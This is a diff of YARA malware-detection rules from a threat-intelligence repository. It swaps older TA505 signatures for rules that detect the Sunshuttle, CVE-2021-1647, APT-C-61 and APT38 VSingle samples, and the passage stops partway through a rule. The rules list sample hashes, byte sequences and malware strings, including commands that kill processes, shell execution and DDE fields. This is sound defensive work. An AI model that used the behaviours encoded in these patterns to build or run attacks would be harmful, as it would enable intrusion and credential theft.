"https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-06/Unknown/APT_Unknown_Middle_East_Feb_2020_1.yar#L1-L24" license_url = "N/A" - logic_hash = "f8407f39c4acef3546f8ddc22a04fb0534c5e1fa08d552654d9b9ebdf48fed94" - score = 50 + logic_hash = "64cdac73bc3e29e8716cb24ae6577f853b2cf31303d129a0ec38ba89b7ff5351" + score = 75 quality = 75 tags = "FILE" - hash1 = "877c612cf42d85b943010437599b828383ecdf02a17e2b017367db34637e5463" - level = "Experimental" - tlp = "White" - adversary = "-" + hash1 = "274beb57ae19cbc5c2027e08cb2b718dea7ed1acb21bd329d5aba33231fb699d" + hash2 = "3a4ef9b7bd7f61c75501262e8b9e31f9e9bc3a841d5de33dcdeb8aaa65e95f76" strings: - $s1 = { 33 d2 33 c9 44 8d 42 07 ff 15 97 20 04 00 4c 89 64 24 60 48 c7 44 24 68 07 00 00 00 66 44 89 64 24 50 41 b8 3f 00 00 00 48 8d 15 7e de 04 00 48 8d 4c 24 50 e8 24 5b ff ff 48 83 7c 24 60 00 0f 84 a0 00 00 00 0f 57 c0 33 c0 0f 11 45 90 0f 11 45 a0 0f 11 45 b0 0f 11 45 c0 0f 11 45 d0 0f 11 45 e0 48 89 45 f0 0f 11 44 24 70 48 89 45 80 48 8d 54 24 50 48 83 7c 24 68 08 48 0f 43 54 24 50 48 8d 44 24 70 48 89 44 24 48 48 8d 45 90 48 89 44 24 40 4c 89 64 24 38 4c 89 64 24 30 c7 44 24 28 00 00 00 08 c7 44 24 20 01 00 00 00 45 33 c9 45 33 c0 33 c9 ff 15 fa 1b 04 00 85 c0 74 26 ba ff ff ff ff 48 8b 4c 24 70 ff 15 b6 1c 04 00 48 8b 4c 24 78 ff 15 9b 1d 04 00 48 8b 4c 24 70 ff 15 90 1d 04 00 48 8b 54 24 68 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4c 24 50 48 8b c1 48 } - $s2 = { e8 4e da 01 00 4c 89 64 24 60 48 c7 44 24 68 07 00 00 00 66 44 89 64 24 50 41 b8 43 00 00 00 48 8d 15 e5 dd 04 00 48 8d 4c 24 50 e8 0b 5a ff ff 48 83 7c 24 60 00 0f 84 a0 00 00 00 0f 57 c0 33 c0 0f 11 45 90 0f 11 45 a0 0f 11 45 b0 0f 11 45 c0 0f 11 45 d0 0f 11 45 e0 48 89 45 f0 0f 11 44 24 70 48 89 45 80 48 8d 54 24 50 48 83 7c 24 68 08 48 0f 43 54 24 50 48 8d 44 24 70 48 89 44 24 48 48 8d 45 90 48 89 44 24 40 4c 89 64 24 38 4c 89 64 24 30 c7 44 24 28 00 00 00 08 c7 44 24 20 01 00 00 00 45 33 c9 45 33 c0 33 c9 ff 15 e1 1a 04 00 85 c0 74 26 ba ff ff ff ff 48 8b 4c 24 70 ff 15 9d 1b 04 00 48 8b 4c 24 78 ff 15 82 1c 04 00 48 8b 4c 24 70 ff 15 77 1c 04 00 48 8b 54 24 68 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4c 24 50 48 8b c1 48 81 fa 00 10 00 } - $s3 = { 45 33 c0 48 2b d0 48 8d 4d c7 e8 ba cf ff ff 0f 10 45 c7 0f 11 45 07 0f 10 4d d7 0f 11 4d 17 4c 89 6d d7 48 c7 45 df 07 00 00 00 66 44 89 6d c7 41 b0 01 48 8d 55 07 e8 bd 0b 00 00 90 48 8b 55 1f 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4d 07 48 8b c1 48 81 fa 00 10 00 00 72 19 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 0f 87 f9 09 00 00 e8 34 b6 01 00 90 ba 08 01 00 00 e8 d1 39 ff ff 4c 8b c0 48 c7 45 d7 04 01 00 00 48 c7 45 df 07 01 00 00 41 0f b7 c5 49 8b f8 b9 04 01 00 00 66 f3 ab 66 45 89 a8 08 02 00 00 4c 89 45 c7 48 8d 55 c7 48 83 7d df 08 49 0f 43 d0 44 8b 45 d7 48 8d 0d 83 c7 04 00 ff 15 7d f8 03 00 8b d0 48 8b 45 d7 48 3b d0 77 19 48 8d 45 c7 48 83 7d df 08 48 0f 43 45 c7 48 89 55 d7 66 44 89 2c } - $s4 = { 48 8b c3 48 8b 4d b7 48 2b c1 48 83 f8 15 0f 82 7b 04 00 00 4c 8d 4d a7 48 83 7d bf 08 4c 0f 43 4d a7 48 c7 44 24 30 15 00 00 00 48 8d 05 69 c2 04 00 48 89 44 24 28 48 89 4c 24 20 48 8d 4d 07 e8 86 17 00 00 90 45 33 c0 48 8d 55 07 e8 89 05 00 00 90 4c 8b 45 1f 49 83 f8 08 72 0c 49 ff c0 48 8b 55 } + $seq1 = { 55 8b ec 83 e4 f8 81 ec 08 04 00 00 a1 34 45 49 00 33 c4 89 84 24 04 04 00 00 83 ec 08 ba [2] 48 00 b9 ?? 82 48 00 68 [2] 48 00 e8 af 9f ff ff 83 c4 04 ba [2] 48 00 b9 ?? 82 48 00 68 [2] 48 00 e8 98 9f ff ff 83 c4 04 ba [2] 48 00 b9 ?? 82 48 00 68 [2] 48 00 e8 81 9f ff ff 83 c4 0c 8d 04 24 68 00 04 00 00 6a 00 50 e8 [2] 01 00 83 c4 0c 8d 04 24 [4] 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? ab 49 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? 6c 48 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? a9 49 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? 83 48 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 33 c0 66 89 84 24 fe 03 00 00 8d 04 24 68 [2] 48 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? a6 49 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? 83 48 00 68 00 02 00 00 50 e8 [2] 02 00 8d 4c 24 0c e8 6b a1 ff ff 83 c4 04 ba [2] 48 00 b9 ?? 83 48 00 68 [2] 48 00 e8 94 9e ff ff 8b 8c 24 10 04 00 00 83 c4 0c 33 cc e8 [2] 01 00 8b e5 5d } + $seq2 = { 55 8b ec 6a ff 68 [2] 47 00 64 a1 00 00 00 00 50 81 ec d8 00 00 00 a1 34 45 49 00 33 c5 89 45 f0 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 45 08 8b 75 14 c7 45 fc 00 00 00 00 89 85 34 ff ff ff 89 85 40 ff ff ff 33 c0 50 50 50 50 c7 85 3c ff ff ff 00 00 00 00 68 ?? 70 48 00 89 b5 6c ff ff ff c7 85 48 ff ff ff 00 00 00 00 c7 85 44 ff ff ff 00 00 00 00 89 85 50 ff ff ff ff 15 78 55 47 00 89 85 38 ff ff ff 85 c0 74 3f 6a 00 68 bb 01 00 00 68 ?? 6d 48 00 50 ff 15 8c 55 47 00 89 85 44 ff ff ff 85 c0 74 22 68 00 00 80 00 6a 00 6a 00 6a 00 68 ?? 71 48 00 68 ?? 6d 48 00 50 ff 15 90 55 47 00 89 85 50 ff ff ff 8b 3d 44 53 47 00 6a 00 6a 00 6a 00 6a 00 6a ff 56 6a 00 68 e9 fd 00 00 ff d7 8b f0 56 e8 ?? 35 01 00 83 c4 04 89 85 4c ff ff ff 6a 00 6a 00 56 50 6a ff ff b5 6c ff ff ff 6a 00 68 e9 fd 00 00 ff d7 68 80 00 00 00 8b f8 8d 85 70 ff ff ff 6a 00 50 e8 [2] 02 00 57 8d 85 70 ff ff ff 68 ?? 79 48 00 50 e8 ?? a3 00 00 83 c4 18 c7 85 64 ff ff ff 00 00 00 00 33 c0 c7 85 68 ff ff ff 07 00 00 00 8d 8d 54 ff ff ff 66 89 85 54 ff ff ff 6a 10 68 [2] 48 00 e8 ?? 84 00 00 8d 8d 70 ff ff ff c7 45 fc 01 00 00 00 8d 51 02 66 8b 01 83 c1 02 66 85 c0 75 f5 2b ca 8d 85 70 ff ff ff d1 f9 51 50 8d 8d 54 ff ff ff e8 89 63 00 00 6a 33 68 ?? 71 48 00 8d 8d 54 ff ff ff e8 77 63 00 00 8b b5 50 ff ff ff 85 f6 } + $s1 = "taskkill /im svehost.exe /t /f" fullword ascii + $s2 = "\\AppData\\Windows\\svehost.exe" fullword ascii + $s3 = "svehost.exe" fullword wide + $s4 = "bdagent.exe" fullword wide + $s5 = "taskkill /im keepass.exe /t /f" fullword ascii + $s6 = "%s\\AppData\\Windows\\svehost" fullword ascii + $s7 = "\\AppData\\Roaming\\ViberPc" fullword wide + $s8 = "\\AppData\\Roaming\\Skype" fullword wide condition: - uint16(0)==0x5a4d and filesize >100KB and 3 of ($s*) + uint16(0)==0x5a4d and filesize >200KB and 1 of ($seq*) and 4 of ($s*) } -import "pe" - -rule ARKBIRD_SOLG_TA505_Bin_21Nov_1 : FILE +rule ARKBIRD_SOLG_APT_UNC2452_Sunshuttle_Mar_2021_1 : FILE { meta: - description = "module1.bin" + description = "Detect Sunshuttle implant used by UNC2452 group" author = "Arkbird_SOLG" - id = "2f23653e-5158-5a64-86ee-a58048780661" - date = "2019-11-21" - modified = "2019-11-21" - reference = "https://twitter.com/58_158_177_102/status/1197432303057637377" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20-11-19/Yara_Rule_TA505_Nov19.yar#L3-L30" + id = "faa07d19-4c61-554d-a6b1-ab7cb0919ec0" + date = "2021-03-06" + modified = "2021-03-06" + reference = "https://twitter.com/Arkbird_SOLG/status/1367570764468224010" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-06/UNC2452/APT_UNC2452_sunshuttle_Mar_2021_1.yar#L1-L31" license_url = "N/A" - logic_hash = "133f202300a9e0428d20ce76bc832cf45cb5dacb05e39c21130d8d5cc39446ba" + logic_hash = "368487f1716aaa5c10e19a428649d6706b3f45c53853e6729752dc41fc97bc38" score = 75 - quality = 75 + quality = 63 tags = "FILE" - hash1 = "bfe610790d41091c37ae627472f5f8886357e713945ca8a5e2b56cd6c791f989" + hash1 = "611458206837560511cb007ab5eeb57047025c2edc0643184561a6bf451e8c2c" + hash2 = "b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8" + hash3 = "bbd16685917b9b35c7480d5711193c1cd0e4e7ccb0f2bf1fd584c0aebca5ae4c" strings: - $s1 = "intc.dll" fullword ascii - $s2 = "?%?2?7?=?" fullword ascii - $s3 = "Is c++ not java" fullword ascii - $s4 = "4%5K5e5l5p5t5x5|5" fullword ascii - $s5 = "KdaMt$" fullword ascii - $s6 = ";*;9;Z;`;" fullword ascii - $s7 = "<*<4<?<I<S<Y<" fullword ascii - $s8 = "0'040A0K0U0]0k0" fullword ascii - $s9 = "3 3(30363>3M3_3" fullword ascii - $s10 = ": :9:A:F:R:W:t:z:" fullword ascii - $s11 = "5'5,585@5H5P5f5n5v5~5" fullword ascii - $s12 = "<,<2<:<@<h<n<" fullword ascii - $s13 = "8+808:8T8b8j8p8" fullword ascii - $s14 = "8!9<9K9g9o9z9" fullword ascii - $s15 = ">(>6>D>N>U>f>p>" fullword ascii - $s16 = ":!:,:>:J:X:^:c:i:v:" fullword ascii + $s1 = { 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 39 59 72 42 6a 6b 6b 58 46 79 6b 62 47 51 72 6d 56 32 4b 49 2f 41 48 44 69 7a 57 51 61 4d 38 47 38 4a 37 6b 56 4b 32 56 65 2f 46 55 74 5f 6b 6b 53 56 6c 78 32 36 49 6e 46 56 61 79 70 77 2f 6c 75 5a 41 54 35 55 6e 55 69 34 64 4a 65 6b 6e 73 6b 55 6e 22 } + $s2 = { 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 71 6f 66 49 6b 76 62 6c 73 31 69 72 4f 36 78 68 6a 41 63 5a 2f 6a 49 69 71 41 70 70 31 56 6f 39 72 4f 53 2d 44 6a 65 4e 75 2f 62 50 75 6e 33 4e 35 74 49 42 58 4b 50 74 4e 79 73 48 4f 51 2f 41 52 53 72 63 65 6b 35 68 51 47 38 59 49 56 6e 4d 75 37 54 22 } + $s3 = { 6f 73 2f 65 78 65 63 2e 28 2a 43 6d 64 29 2e 52 75 6e } + $s4 = "main.request_session_key" fullword ascii + $s5 = "main.wget_file" fullword ascii + $s6 = "main.GetMD5Hash" fullword ascii + $s7 = "main.beaconing" fullword ascii + $s8 = "main.resolve_command" fullword ascii + $s9 = "main.send_file_part" fullword ascii + $s10 = "main.retrieve_session_key" fullword ascii + $s11 = "main.send_command_result" fullword ascii + $s12 = { 63 38 3a 32 37 3a 63 63 3a 63 32 3a 33 37 3a 35 61 } + $s13 = { 2d 2d 2d 2d 2d 42 45 47 49 4e } + $s14 = { 2d 2d 2d 2d 2d 45 4e 44 } condition: - uint16(0)==0x5a4d and filesize <900KB and (pe.imphash()=="642f4619fb2d93cb205c65c2546516ca" and pe.exports("intc") or 8 of them ) + uint16(0)==0x5a4d and filesize >800KB and 12 of them } -import "pe" - -rule ARKBIRD_SOLG_TA505_Bin_21Nov_2 : FILE +rule ARKBIRD_SOLG_EXP_CVE_2021_1647_Apr_2021_1 : CVE_2021_1647 FILE { meta: - description = "vspub1.bin" + description = "Detect CVE-2021-1647 tool " author = "Arkbird_SOLG" - id = "2bbd1d3a-50ab-5c6a-97fe-60b5a86e8d18" - date = "2019-11-21" - modified = "2019-11-21" - reference = "https://twitter.com/58_158_177_102/status/1197432303057637377" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20-11-19/Yara_Rule_TA505_Nov19.yar#L32-L50" + id = "c4c14d22-adf8-51b1-b898-7e253447824f" + date = "2021-05-04" + modified = "2021-05-05" + reference = "-" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-04/CVE-2021-1647/EXP_CVE_2021_1647_Apr_2021_1.yara#L1-L18" license_url = "N/A" - logic_hash = "43fb83abdeb1a31da836b4cf99dcda269f6d005cbb8eb2d845498d2c589574e1" + logic_hash = "58f16973f68b1b792f6f1575b6a3f386493d033767ee97e48a33044e3ddc3426" score = 75 quality = 75 - tags = "FILE" - hash1 = "54cc27076793d5de064813c61d52452d42f774d24b3859a63002d842914fd9cd" + tags = "CVE-2021-1647, FILE" + hash1 = "6e1e9fa0334d8f1f5d0e3a160ba65441f0656d1f1c99f8a9f1ae4b1b1bf7d788" + hash2 = "9eaea8a56c47524f6d6b2e2bb72d035c1aa782a4f069ef9df92a0af5c6ee612b" + hash3 = "db0e53c9db41d4de21f4bbf1f60d977f5d935239d3fce8b902e8ef0082796cc7" + hash4 = "24d9ff44affea06435829507e8e6cb4b659468aa2af510031ed963caf5a6d77a" + tlp = "Green" + adversary = "-" strings: - $s1 = "glColor.dll" fullword ascii - $s2 = "{sysdir}\\nvu*.exe" fullword ascii - $s3 = "KLSUIrhekheirguhemure" fullword ascii - $s4 = "tEo>qM" fullword ascii - $s5 = "?\"?0?8?>?I?V?^?l?q?v?{?" fullword ascii - $s6 = ";\";0;d;" fullword ascii - $s7 = "T0p0v0|0" fullword ascii + $seq1 = { 83 7d ec 01 0f 8e fe 76 ff ff 83 45 f4 01 83 7d f4 01 0f 8e e4 76 ff ff 8b 45 e4 89 04 24 e8 12 74 ff ff 83 ec 04 a1 [2] 01 b1 85 c0 75 0e 8b 45 e4 89 04 24 e8 fb 73 ff ff 83 ec 04 a1 28 ?? 01 b1 c7 44 24 04 00 00 00 00 c7 04 24 00 00 00 00 ff d0 83 ec 08 b8 00 00 00 00 c9 c2 04 00 55 89 e5 83 ec 10 c7 45 f4 00 ?? 01 70 8b 45 08 83 e8 01 a3 70 ?? 01 b1 c7 05 74 ?? 01 b1 00 00 00 00 c7 05 a0 ?? 02 b1 00 00 00 00 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 } + $seq2 = { a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 75 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc c7 45 f8 00 00 00 00 eb 19 8b 45 f8 05 e2 ff ff 7f 8d 14 00 8b 45 fc 01 d0 66 c7 00 01 00 83 45 f8 01 83 7d f8 3b 7e e1 8b 45 fc } condition: - uint16(0)==0x5a4d and filesize <900KB and (pe.imphash()=="ff6dd5f31dd7c538ebc02542f09f4280" and pe.exports("setColor") or all of them ) + filesize >10KB and all of them } -import "pe" - -rule ARKBIRD_SOLG_TA505_Maldoc_21Nov_1 : FILE +rule ARKBIRD_SOLG_APT_APT_C_61_Dec_2021_1 : FILE { meta: - description = "invitation.doc" + description = "Detect similiar structures used in the APT-C-61 maldocs" author = "Arkbird_SOLG" - id = "10562979-0b90-5752-89b8-f0d35121df41" - date = "2019-11-21" - modified = "2019-11-21" - reference = "https://twitter.com/58_158_177_102/status/1197432303057637377" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20-11-19/Yara_Rule_TA505_Nov19.yar#L52-L83" + id = "48054d32-6613-5a54-b19c-8e9b8f747c14" + date = "2021-12-13" + modified = "2021-12-14" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-13/APT_APT_C_61_Dec_2021_1.yara#L1-L20" license_url = "N/A" - logic_hash = "7d2cbc0a505c245aa3e9e8a76cebc7ea7dbd4bd3be26a858f731b96791293ba5" + logic_hash = "be742a0ebc53f09872d5231cf367bb1e3ae04c1a70ce94610b6597e426eeb389" score = 75 - quality = 50 + quality = 69 tags = "FILE" - hash1 = "a197c6de8734044c441438508dd3ce091252de4f98df2016b006a1c963c02505" + hash1 = "2cc0f8a85df2b2b0dd4c6942125bf82e647e9ac7bb91467ac5c480cf5e1dd4ff" + hash2 = "193c921f7ab12c0066014ffad37a98ee57ecd5101dae2ddeb5e39200eb704431" + hash3 = "4ec021cc3dbb2b0de7313e41063026e3ef4777baf4dec2bdad7cd2d515bf0fe2" + tlp = "white" + adversary = "APT-C-61" strings: - $x1 = "C:\\Users\\J\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\basecamp" fullword wide - $x2 = "*\\G{42DC991A-7E1B-4254-B210-CDD3DDCFD365}#2.0#0#C:\\Users\\1\\AppData\\Local\\Temp\\VBE\\MSForms.exd#Microsoft Forms 2.0 Object" wide - $x3 = "*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library" fullword wide - $x4 = "C:\\Users\\J\\AppData\\Local\\Temp\\basecamp" fullword wide - $s5 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft " wide - $s6 = "*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual" wide - $s7 = "glColor.dll" fullword ascii - $s8 = "magne.dll" fullword ascii - $s9 = "InitScope.dll" fullword wide - $s10 = "*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" fullword wide - $s11 = "CopyFiles=@EP0NGJ8D.GPD,@EP0NGN8D.GPD,@EP0NGX8D.GPD,@EP0NCJ8D.CMB,@EP0NOJ8D.DXT,@EP0NOE10.DLL,@EP0NM4RC.DLL,@EP0NRE8D.DLL" fullword wide - $s12 = "CopyFiles=@EP0NGJ8C.GPD,@EP0NGN8C.GPD,@EP0NGX8C.GPD,@EP0NCJ8C.CMB,@EP0NOJ8C.DXT,@EP0NOE09.DLL,@EP0NM4RB.DLL,@EP0NRE8C.DLL" fullword wide - $s13 = "vspub2.dll-" fullword ascii - $s14 = "pictarget" fullword ascii - $s15 = "Public Declare Function ZooDcom Lib \"vspub1.dll\" Alias \"IKAJSL\" () As Integer" fullword ascii - $s16 = "\"Epson\"=\"http://go.microsoft.com/fwlink/?LinkID=36&prd=10798&sbp=Printers\"" fullword wide - $s17 = "EP0NM4RC.DLL = 1" fullword wide - $s18 = "EP0NOE10.DLL = 1" fullword wide - $s19 = "EP0NRE8C.DLL = 1" fullword wide - $s20 = "EP0NM4RB.DLL = 1" fullword wide + $s1 = { 3e 3c 77 3a 69 6e 73 74 72 54 65 78 74 3e 53 45 54 20 [1-4] 3c 2f 77 3a 69 6e 73 74 72 54 65 78 74 3e } + $s2 = { 3c 2f 77 3a 72 3e 3c 77 3a 66 6c 64 53 69 6d 70 6c 65 20 77 3a 69 6e 73 74 72 3d 22 20 20 51 55 4f 54 45 20 20 } + $s3 = { 3c 77 3a 69 6e 73 74 72 54 65 78 74 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 20 3c 2f 77 3a 69 6e 73 74 72 54 65 78 74 3e } + $s4 = { 3c 77 3a 72 3e 3c 77 3a 69 6e 73 74 72 54 65 78 74 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 20 44 44 45 3c 2f 77 3a 69 6e 73 74 72 54 65 78 74 3e 3c 2f 77 3a 72 3e } condition: - uint16(0)==0xcfd0 and filesize <3000KB and 1 of ($x*) and 4 of them + uint16(0)==0x4b50 and filesize >20KB and all of ($s*) } -import "pe" - -rule ARKBIRD_SOLG_TA505_Maldoc_21Nov_2 : FILE +rule ARKBIRD_SOLG_APT_APT38_Vsingle_Mar_2021_1 : FILE { meta: - description = "invitation (1).xls" + description = "Detect VSingle used in attacks against Japanese organisations by APT38" author = "Arkbird_SOLG" - id = "e6328342-0d08-58a3-befe-15de41649763" - date = "2019-11-21" - modified = "2019-11-21" - reference = "https://twitter.com/58_158_177_102/status/1197432303057637377" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20-11-19/Yara_Rule_TA505_Nov19.yar#L85-L116" + id = "d1d640f6-bcec-5364-8ea5-e0c0b86da6e1" + date = "2021-03-23" + modified = "2021-03-24" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-23/APT38/APT_APT38_VSingle_Mar_2021_1.yar#L1-L24" license_url = "N/A" - logic_hash = "84c7f064fb813934e397d81dad8af6288cb919e046cd2bb16f9ca6dc348c43c2" - score = 75 - quality = 75 + logic_hash = "d01baac099ce33b837c83d6778900f7e55b8c63e75d0e552c10ababc8dec744c" + score = 50 + quality = 69 tags = "FILE" - hash1 = "270b398b697f10b66828afe8d4f6489a8de48b04a52a029572412ae4d20ff89b" + hash1 = "487c1bdb65634a794fa5e359c383c94945ce9f0806fcad46440e919ba0e6166e" + level = "experimental" strings: - $x1 = "C:\\Users\\J\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\AFFA0BDC.tmp" fullword wide - $x2 = "C:\\Users\\J\\AppData\\Local\\Temp\\AFFA0BDC.tmp" fullword wide - $x3 = "C:\\Windows\\system32\\FM20.DLL" fullword ascii - $x4 = "C:\\Users\\J\\AppData\\Local\\Temp\\VBE\\MSForms.exd" fullword ascii - $x5 = "C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" fullword ascii - $x6 = "C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" fullword ascii - $x7 = "*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library" fullword wide - $x8 = "*\\G{BA45F137-16B2-487D-9A21-F38179C0576C}#2.0#0#C:\\Users\\J\\AppData\\Local\\Temp\\VBE\\MSForms.exd#Microsoft Forms 2.0 Object" wide - $s9 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft " wide - $s10 = "lIySgefa86jIfdEkSZVDoSs5BDkcalCieNBN4EqfVaEs2wWD4OjpTiOBqDrL3d9WCaDAKZpoJPRnoacfQPhucmy69axznNmRbRY12v3ez5PdAAnpAl5m5NUqKHBKCYb5" ascii - $s11 = "35mvkZ9ZvIttuHSTUKWZCdOsh5j4Y1p2pJ3vi5onOXnMcEPIUIK1UWAYq3noPeaDtAdUOxKYvIlNZbqMpJjqpxhCidfpQ9GJXStKA44w7UFlKV9oMK8f5Tn6tKMKsviw" ascii - $s12 = "*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual" wide - $s13 = "verkar.dll" fullword ascii - $s14 = "intc.dll" fullword ascii - $s15 = "YjAygups4wPzNU7lNIGBuFbv6Triw8rxEPLSjrYSKXdUV8QuzbwJvdHshfBvdh66er47iobvTX1FCqI8d6RuKRcBhsLdYCOC1hPEdTllabYHlcZ1FDsgyLuwoCZYM7Fq" ascii - $s16 = "MinuetsOs.dll" fullword wide - $s17 = "KaBYL8xLRpN7VMzibXEzxh2GetwfB6MY9k3dRCNncC5eiyKNTaTrcoUDi4TrLrkULX7KSvAHjrw4lXxPRSvBmvWUzz5WRwKTskBtBa4xIlhT1ZruGeI36SIqamksANYW" ascii - $s18 = "XmhvJDfd16Hxk6eRMKJ7sqYIVneFVN7iUzRF8or7LKNKW9bhf5a7V5OGwIIvyJrm8yMUoITytLvRMoVWm7z1NawYTkjzP5HbtBLxwp3GkLMjJ74iWVjBjzI8cWadyuRy" ascii - $s19 = "Sx3mdokmfv27AYhtFublOb5Exec1r1b5LAAbsRHrjLKTWiG4K9dKXbuQBxY9mt4nu7u9ygaWWTcczlRpGhpsXzgKgTI52IfZRxyZWHFD8pXd9sqqOJBedLy4ZT3OHe5n" ascii - $s20 = "C:\\Windows\\system32\\stdole2.tlb" fullword ascii + $dbg1 = { 68 74 74 70 [0-1] 3a 2f 2f 25 73 25 73 } + $dbg2 = { 43 72 65 61 74 65 4e 61 6d 65 64 50 69 70 65 41 20 66 69 6e 69 73 68 65 64 20 77 69 74 68 20 45 72 72 6f 72 2d 25 64 } + $dbg3 = { 4f 53 3a 20 25 73 25 73 20 53 50 20 25 64 20 25 73 20 28 25 64 2e 25 64 2e 25 64 29 0d 0a } + $dbg4 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 75 00 20 00 2f 00 63 00 20 00 25 00 73 } + $dbg5 = { 0d 0a 43 6f 6f 6b 69 65 3a 20 25 